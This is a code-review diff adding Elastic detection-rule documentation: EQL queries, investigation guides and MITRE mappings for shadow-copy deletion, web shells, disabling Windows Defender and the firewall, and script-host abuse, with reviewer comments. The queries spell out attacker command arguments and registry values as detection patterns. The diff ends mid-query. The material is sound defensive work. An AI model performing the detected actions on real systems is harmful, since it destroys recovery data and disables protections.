+- Priority should be given due to the advanced stage of this activity on the attack. +- If the triage identified malware, search the environment for additional compromised hosts. + - Implement temporary network rules, procedures, and segmentation to contain the malware. + - Stop suspicious processes. + - Immediately block the identified indicators of compromise (IoCs). + - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system. +- Remove and block malicious artifacts identified during triage. +- If data was encrypted, deleted, or modified, activate your data recovery plan. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. +- Perform data recovery locally or restore the backups from replicated copies (cloud, other servers, etc.). +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). 
+---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "windows" and event.type == "start" and + process.name : ("powershell.exe", "pwsh.exe", "powershell_ise.exe") and + process.args : ("*Get-WmiObject*", "*gwmi*", "*Get-CimInstance*", "*gcim*") and + process.args : ("*Win32_ShadowCopy*") and + process.args : ("*.Delete()*", "*Remove-WmiObject*", "*rwmi*", "*Remove-CimInstance*", "*rcim*") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Impact +** ID: TA0040 +** Reference URL: https://attack.mitre.org/tactics/TA0040/ +* Technique: +** Name: Inhibit System Recovery +** ID: T1490 +** Reference URL: https://attack.mitre.org/techniques/T1490/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: PowerShell +** ID: T1059.001 +** Reference URL: https://attack.mitre.org/techniques/T1059/001/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-volume-shadow-copy-deletion-via-wmic.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-volume-shadow-copy-deletion-via-wmic.asciidoc new file mode 100644 index 0000000000..e593ed906a --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-volume-shadow-copy-deletion-via-wmic.asciidoc 
@@ -0,0 +1,138 @@ +[[prebuilt-rule-8-10-5-volume-shadow-copy-deletion-via-wmic]] +=== Volume Shadow Copy Deletion via WMIC + +Identifies use of wmic.exe for shadow copy deletion on endpoints. This commonly occurs in tandem with ransomware or other destructive attacks. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-endpoint.events.* +* logs-windows.* +* endgame-* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Impact +* Tactic: Execution +* Resources: Investigation Guide +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 107 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating Volume Shadow Copy Deletion via WMIC + +The Volume Shadow Copy Service (VSS) is a Windows feature that enables system administrators to take snapshots of volumes that can later be restored or mounted to recover specific files or folders. + +A typical step in the playbook of an attacker attempting to deploy ransomware is to delete Volume Shadow Copies to ensure that victims have no alternative to paying the ransom, making any action that deletes shadow copies worth monitoring. + +This rule monitors the execution of `wmic.exe` to interact with VSS via the `shadowcopy` alias and delete parameter. + +#### Possible investigation steps + +- Investigate the program execution chain (parent process tree). +- Check whether the account is authorized to perform this operation. +- Contact the account owner and confirm whether they are aware of this activity. 
+- In the case of a resize operation, check if the resize value is equal to suspicious values, like 401MB. +- Investigate other alerts associated with the user/host during the past 48 hours. +- If unsigned files are found on the process tree, retrieve them and determine if they are malicious: + - Use a private sandboxed malware analysis system to perform analysis. + - Observe and collect information about the following activities: + - Attempts to contact external domains and addresses. + - File and registry access, modification, and creation activities. + - Service creation and launch activities. + - Scheduled task creation. + - Use the PowerShell Get-FileHash cmdlet to get the files' SHA-256 hash values. + - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc. +- Use process name, command line, and file hash to search for occurrences in other hosts. +- Check if any files on the host machine have been encrypted. + + +### False positive analysis + +- This rule has chances of producing benign true positives (B-TPs). If this activity is expected and noisy in your environment, consider adding exceptions — preferably with a combination of user and command line conditions. + +### Related rules + +- Volume Shadow Copy Deleted or Resized via VssAdmin - b5ea4bfe-a1b2-421f-9d47-22a75a6f2921 +- Volume Shadow Copy Deletion via PowerShell - d99a037b-c8e2-47a5-97b9-170d076827c4 + +### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. +- Priority should be given due to the advanced stage of this activity on the attack. +- Consider isolating the involved host to prevent destructive behavior, which is commonly associated with this activity. +- If the triage identified malware, search the environment for additional compromised hosts. + - Implement temporary network rules, procedures, and segmentation to contain the malware. + - Stop suspicious processes. 
+ - Immediately block the identified indicators of compromise (IoCs). + - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system. +- Remove and block malicious artifacts identified during triage. +- If data was encrypted, deleted, or modified, activate your data recovery plan. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. +- Perform data recovery locally or restore the backups from replicated copies (cloud, other servers, etc.). +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). 
+---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "windows" and event.type == "start" and + (process.name : "WMIC.exe" or process.pe.original_file_name == "wmic.exe") and + process.args : "delete" and process.args : "shadowcopy" + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Impact +** ID: TA0040 +** Reference URL: https://attack.mitre.org/tactics/TA0040/ +* Technique: +** Name: Inhibit System Recovery +** ID: T1490 +** Reference URL: https://attack.mitre.org/techniques/T1490/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Windows Management Instrumentation +** ID: T1047 +** Reference URL: https://attack.mitre.org/techniques/T1047/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-web-shell-detection-script-process-child-of-common-web-processes.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-web-shell-detection-script-process-child-of-common-web-processes.asciidoc new file mode 100644 index 0000000000..476474ef1c --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-web-shell-detection-script-process-child-of-common-web-processes.asciidoc 
@@ -0,0 +1,157 @@ +[[prebuilt-rule-8-10-5-web-shell-detection-script-process-child-of-common-web-processes]] +=== Web Shell Detection: Script Process Child of Common Web Processes + +Identifies suspicious commands executed via a web server, which may suggest a vulnerability and remote shell access. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-endpoint.events.* +* logs-windows.* +* endgame-* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.microsoft.com/security/blog/2020/02/04/ghost-in-the-shell-investigating-web-shell-attacks/ +* https://www.elastic.co/security-labs/elastic-response-to-the-the-spring4shell-vulnerability-cve-2022-22965 +* https://www.elastic.co/security-labs/hunting-for-persistence-using-elastic-security-part-1 + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Persistence +* Tactic: Initial Access +* Tactic: Execution +* Resources: Investigation Guide +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 107 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating Web Shell Detection: Script Process Child of Common Web Processes + +Adversaries may backdoor web servers with web shells to establish persistent access to systems. A web shell is a web script that is placed on an openly accessible web server to allow an adversary to use the web server as a gateway into a network. A web shell may provide a set of functions to execute or a command-line interface on the system that hosts the web server. 
+ +This rule detects a web server process spawning script and command-line interface programs, potentially indicating attackers executing commands using the web shell. + +#### Possible investigation steps + +- Investigate abnormal behaviors observed by the subject process such as network connections, registry or file modifications, and any other spawned child processes. +- Examine the command line to determine which commands or scripts were executed. +- Investigate other alerts associated with the user/host during the past 48 hours. +- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts. +- If scripts or executables were dropped, retrieve the files and determine if they are malicious: + - Use a private sandboxed malware analysis system to perform analysis. + - Observe and collect information about the following activities: + - Attempts to contact external domains and addresses. + - File and registry access, modification, and creation activities. + - Service creation and launch activities. + - Scheduled task creation. + - Use the PowerShell Get-FileHash cmdlet to get the files' SHA-256 hash values. + - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc. + +### False positive analysis + +- This activity is unlikely to happen legitimately. Any activity that triggered the alert and is not inherently malicious must be monitored by the security team. + +### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. +- Isolate the involved host to prevent further post-compromise behavior. +- If the triage identified malware, search the environment for additional compromised hosts. + - Implement temporary network rules, procedures, and segmentation to contain the malware. + - Stop suspicious processes. + - Immediately block the identified indicators of compromise (IoCs). 
+ - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system. +- Remove and block malicious artifacts identified during triage. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "windows" and event.type == "start" and + process.parent.name : ("w3wp.exe", "httpd.exe", "nginx.exe", "php.exe", "php-cgi.exe", "tomcat.exe") and + process.name : ("cmd.exe", "cscript.exe", "powershell.exe", "pwsh.exe", "powershell_ise.exe", "wmic.exe", "wscript.exe") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Server Software Component +** ID: T1505 +** Reference URL: https://attack.mitre.org/techniques/T1505/ +* Sub-technique: +** Name: Web Shell +** ID: T1505.003 +** Reference URL: https://attack.mitre.org/techniques/T1505/003/ +* Tactic: +** Name: Initial Access +** ID: TA0001 +** Reference URL: https://attack.mitre.org/tactics/TA0001/ +* Technique: +** Name: Exploit Public-Facing Application +** ID: T1190 +** Reference URL: https://attack.mitre.org/techniques/T1190/ +* Tactic: 
+** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: PowerShell +** ID: T1059.001 +** Reference URL: https://attack.mitre.org/techniques/T1059/001/ +* Sub-technique: +** Name: Windows Command Shell +** ID: T1059.003 +** Reference URL: https://attack.mitre.org/techniques/T1059/003/ +* Sub-technique: +** Name: Visual Basic +** ID: T1059.005 +** Reference URL: https://attack.mitre.org/techniques/T1059/005/ +* Technique: +** Name: Windows Management Instrumentation +** ID: T1047 +** Reference URL: https://attack.mitre.org/techniques/T1047/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-windows-defender-disabled-via-registry-modification.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-windows-defender-disabled-via-registry-modification.asciidoc new file mode 100644 index 0000000000..9311eecc55 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-windows-defender-disabled-via-registry-modification.asciidoc 
@@ -0,0 +1,142 @@ +[[prebuilt-rule-8-10-5-windows-defender-disabled-via-registry-modification]] +=== Windows Defender Disabled via Registry Modification + +Identifies modifications to the Windows Defender registry settings to disable the service or set the service to be started manually. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-endpoint.events.* +* logs-windows.* +* endgame-* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://thedfirreport.com/2020/12/13/defender-control/ + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Defense Evasion +* Resources: Investigation Guide +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 107 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating Windows Defender Disabled via Registry Modification + +Microsoft Windows Defender is an antivirus product built into Microsoft Windows, which makes it popular across multiple environments. Disabling it is a common step in threat actor playbooks. + +This rule monitors the registry for configurations that disable Windows Defender or the start of its service. + +#### Possible investigation steps + +- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures. +- Validate the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations. 
+- Identify the user account that performed the action and whether it should perform this kind of action. +- Contact the account owner and confirm whether they are aware of this activity. +- Investigate other alerts associated with the user/host during the past 48 hours. +- Check if this operation was approved and performed according to the organization's change management policy. + +### False positive analysis + +- This mechanism can be used legitimately. Analysts can dismiss the alert if the administrator is aware of the activity, the configuration is justified (for example, it is being used to deploy other security solutions or troubleshooting), and no other suspicious activity has been observed. + +### Related rules + +- Disabling Windows Defender Security Settings via PowerShell - c8cccb06-faf2-4cd5-886e-2c9636cfcb87 +- Microsoft Windows Defender Tampering - fe794edd-487f-4a90-b285-3ee54f2af2d3 + +### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. +- Isolate the involved hosts to prevent further post-compromise behavior. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. +- Re-enable Windows Defender and restore the service configurations to automatic start. +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Review the privileges assigned to the user to ensure that the least privilege principle is being followed. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). 
+---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +registry where host.os.type == "windows" and event.type in ("creation", "change") and + ( + ( + registry.path: ( + "HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\DisableAntiSpyware", + "\\REGISTRY\\MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\DisableAntiSpyware" + ) and + registry.data.strings: ("1", "0x00000001") + ) or + ( + registry.path: ( + "HKLM\\System\\*ControlSet*\\Services\\WinDefend\\Start", + "\\REGISTRY\\MACHINE\\System\\*ControlSet*\\Services\\WinDefend\\Start" + ) and + registry.data.strings in ("3", "4", "0x00000003", "0x00000004") + ) + ) and + + not process.executable : + ("?:\\WINDOWS\\system32\\services.exe", + "?:\\Windows\\System32\\svchost.exe", + "?:\\Program Files (x86)\\Trend Micro\\Security Agent\\NTRmv.exe") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Impair Defenses +** ID: T1562 +** Reference URL: https://attack.mitre.org/techniques/T1562/ +* Sub-technique: +** Name: Disable or Modify Tools +** ID: T1562.001 +** Reference URL: https://attack.mitre.org/techniques/T1562/001/ +* Sub-technique: +** Name: Indicator Blocking +** ID: T1562.006 +** Reference URL: https://attack.mitre.org/techniques/T1562/006/ +* Technique: +** Name: Modify Registry +** ID: T1112 +** Reference URL: https://attack.mitre.org/techniques/T1112/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-windows-firewall-disabled-via-powershell.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-windows-firewall-disabled-via-powershell.asciidoc new file mode 100644 index 0000000000..1f42708196 --- /dev/null 
+++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-windows-firewall-disabled-via-powershell.asciidoc 
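Review bot: The blanket exclusion of `?:\\Windows\\System32\\svchost.exe` in the `not process.executable :` clause of the Windows Defender Disabled via Registry Modification query suppresses every `DisableAntiSpyware` or `WinDefend\\Start` change written by a service-hosted process, which is a much wider set than the "planned patches, updates, network administrator activity, or legitimate software installations" the triage guide names as the expected benign sources. If the exclusion is deliberate (for example to keep Group Policy processing quiet), the False positive analysis section should say so; otherwise scope it to the specific service rather than the host binary. Minor consistency point in the same query: the first branch uses `registry.data.strings : (...)` while the second uses `registry.data.strings in (...)`; `in` is case-sensitive in EQL, so the hex forms `"0x00000003"`/`"0x00000004"` are matched differently from `"0x00000001"` in the first branch. Using `:` in both branches keeps the behaviour uniform.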
@@ -0,0 +1,129 @@ +[[prebuilt-rule-8-10-5-windows-firewall-disabled-via-powershell]] +=== Windows Firewall Disabled via PowerShell + +Identifies when the Windows Firewall is disabled using PowerShell cmdlets, which can help attackers evade network constraints, like internet and network lateral communication restrictions. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* +* winlogbeat-* +* logs-windows.* +* endgame-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://docs.microsoft.com/en-us/powershell/module/netsecurity/set-netfirewallprofile?view=windowsserver2019-ps +* https://www.tutorialspoint.com/how-to-get-windows-firewall-profile-settings-using-powershell +* http://powershellhelp.space/commands/set-netfirewallrule-psv5.php +* http://woshub.com/manage-windows-firewall-powershell/ + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Defense Evasion +* Tactic: Execution +* Resources: Investigation Guide +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 107 + +*Rule authors*: + +* Austin Songer + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating Windows Firewall Disabled via PowerShell + +Windows Defender Firewall is a native component that provides host-based, two-way network traffic filtering for a device and blocks unauthorized network traffic flowing into or out of the local device. + +Attackers can disable the Windows firewall or its rules to enable lateral movement and command and control activity. 
+ +This rule identifies patterns related to disabling the Windows firewall or its rules using the `Set-NetFirewallProfile` PowerShell cmdlet. + +#### Possible investigation steps + +- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures. +- Identify the user account that performed the action and whether it should perform this kind of action. +- Contact the account owner and confirm whether they are aware of this activity. +- Investigate other alerts associated with the user/host during the past 48 hours. +- Inspect the host for suspicious or abnormal behavior in the alert timeframe. + +### False positive analysis + +- This mechanism can be used legitimately. Check whether the user is an administrator and is legitimately performing troubleshooting. +- In case of an allowed benign true positive (B-TP), assess adding rules to allow needed traffic and re-enable the firewall. + +### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. +- Isolate the involved hosts to prevent further post-compromise behavior. +- Re-enable the firewall with its desired configurations. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. +- Review the privileges assigned to the involved users to ensure that the least privilege principle is being followed. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). 
+---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "windows" and event.action == "start" and + (process.name : ("powershell.exe", "pwsh.exe", "powershell_ise.exe") or process.pe.original_file_name == "PowerShell.EXE") and + process.args : "*Set-NetFirewallProfile*" and + (process.args : "*-Enabled*" and process.args : "*False*") and + (process.args : "*-All*" or process.args : ("*Public*", "*Domain*", "*Private*")) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Impair Defenses +** ID: T1562 +** Reference URL: https://attack.mitre.org/techniques/T1562/ +* Sub-technique: +** Name: Disable or Modify System Firewall +** ID: T1562.004 +** Reference URL: https://attack.mitre.org/techniques/T1562/004/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: PowerShell +** ID: T1059.001 +** Reference URL: https://attack.mitre.org/techniques/T1059/001/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-windows-script-executing-powershell.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-windows-script-executing-powershell.asciidoc new file mode 100644 index 0000000000..d11bc6a3e4 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-windows-script-executing-powershell.asciidoc 
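Review bot: `event.action == "start"` in the Windows Firewall Disabled via PowerShell query differs from every other process rule in this patch, which filters on `event.type == "start"` (see the Windows Script Executing PowerShell and both WMI hunks). With `winlogbeat-*` and `logs-windows.*` in the index list, a process-creation event whose `event.action` carries a different value would be skipped even though its `event.type` is `start`; align on `event.type == "start"` or confirm that every listed source populates `event.action` with that literal. Also, the description and the triage guide talk about disabling the firewall "or its rules", and the references include a `set-netfirewallrule` page, but the query only matches `Set-NetFirewallProfile`; either tighten the wording to profile-level changes or document that rule-level changes are out of scope for this rule.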
@@ -0,0 +1,142 @@ +[[prebuilt-rule-8-10-5-windows-script-executing-powershell]] +=== Windows Script Executing PowerShell + +Identifies a PowerShell process launched by either cscript.exe or wscript.exe. Observing Windows scripting processes executing a PowerShell script, may be indicative of malicious activity. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-endpoint.events.* +* logs-windows.* +* endgame-* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Initial Access +* Tactic: Execution +* Resources: Investigation Guide +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 107 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating Windows Script Executing PowerShell + +The Windows Script Host (WSH) is an Windows automation technology, which is ideal for non-interactive scripting needs, such as logon scripting, administrative scripting, and machine automation. + +Attackers commonly use WSH scripts as their initial access method, acting like droppers for second stage payloads, but can also use them to download tools and utilities needed to accomplish their goals. + +This rule looks for the spawn of the `powershell.exe` process with `cscript.exe` or `wscript.exe` as its parent process. + +#### Possible investigation steps + +- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures. 
+- Investigate commands executed by the spawned PowerShell process. +- If unsigned files are found on the process tree, retrieve them and determine if they are malicious: + - Use a private sandboxed malware analysis system to perform analysis. + - Observe and collect information about the following activities: + - Attempts to contact external domains and addresses. + - File and registry access, modification, and creation activities. + - Service creation and launch activities. + - Scheduled task creation. + - Use the PowerShell Get-FileHash cmdlet to get the files' SHA-256 hash values. + - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc. +- Determine how the script file was delivered (email attachment, dropped by other processes, etc.). +- Investigate other alerts associated with the user/host during the past 48 hours. + +### False positive analysis + +- The usage of these script engines by regular users is unlikely. In the case of authorized benign true positives (B-TPs), exceptions can be added. + +### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. +- Isolate the involved host to prevent further post-compromise behavior. +- If the triage identified malware, search the environment for additional compromised hosts. + - Implement temporary network rules, procedures, and segmentation to contain the malware. + - Stop suspicious processes. + - Immediately block the identified indicators of compromise (IoCs). + - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system. +- Remove and block malicious artifacts identified during triage. +- If the malicious file was delivered via phishing: + - Block the email sender from sending future emails. + - Block the malicious web pages. + - Remove emails from the sender from mailboxes. 
+ - Consider improvements to the security awareness program. +- Reimage the host operating system and restore compromised files to clean versions. +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "windows" and event.type == "start" and + process.parent.name : ("cscript.exe", "wscript.exe") and process.name : "powershell.exe" + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Initial Access +** ID: TA0001 +** Reference URL: https://attack.mitre.org/tactics/TA0001/ +* Technique: +** Name: Phishing +** ID: T1566 +** Reference URL: https://attack.mitre.org/techniques/T1566/ +* Sub-technique: +** Name: Spearphishing Attachment +** ID: T1566.001 +** Reference URL: https://attack.mitre.org/techniques/T1566/001/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: PowerShell +** ID: T1059.001 +** Reference URL: https://attack.mitre.org/techniques/T1059/001/ +* Sub-technique: +** Name: Visual Basic +** ID: T1059.005 +** Reference URL: https://attack.mitre.org/techniques/T1059/005/ 
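Review bot: The Windows Script Executing PowerShell query matches only `process.name : "powershell.exe"`, whereas the Windows Firewall Disabled via PowerShell rule in this same patch identifies PowerShell by `("powershell.exe", "pwsh.exe", "powershell_ise.exe")` together with `process.pe.original_file_name == "PowerShell.EXE"`. A `pwsh.exe` child of `cscript.exe`/`wscript.exe` therefore falls outside this rule even though the triage guide is written for the general case; reusing the broader name list plus the original-file-name check would close that gap. Documentation nits in the same hunk: "is an Windows automation technology" should read "is a Windows automation technology", and the stray comma in "executing a PowerShell script, may be indicative" should go.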
diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-windows-script-interpreter-executing-process-via-wmi.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-windows-script-interpreter-executing-process-via-wmi.asciidoc new file mode 100644 index 0000000000..1f4a383cf3 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-windows-script-interpreter-executing-process-via-wmi.asciidoc 
@@ -0,0 +1,112 @@ +[[prebuilt-rule-8-10-5-windows-script-interpreter-executing-process-via-wmi]] +=== Windows Script Interpreter Executing Process via WMI + +Identifies use of the built-in Windows script interpreters (cscript.exe or wscript.exe) being used to execute a process via Windows Management Instrumentation (WMI). This may be indicative of malicious activity. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-endpoint.events.* +* logs-windows.* +* endgame-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Initial Access +* Tactic: Execution +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 107 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +sequence by host.id with maxspan = 5s + [any where host.os.type == "windows" and + (event.category : ("library", "driver") or (event.category == "process" and event.action : "Image loaded*")) and + (dll.name : "wmiutils.dll" or file.name : "wmiutils.dll") and process.name : ("wscript.exe", "cscript.exe")] + [process where host.os.type == "windows" and event.type == "start" and + process.parent.name : "wmiprvse.exe" and + user.domain != "NT AUTHORITY" and + (process.pe.original_file_name : + ( + "cscript.exe", + "wscript.exe", + "PowerShell.EXE", + "Cmd.Exe", + "MSHTA.EXE", + "RUNDLL32.EXE", + 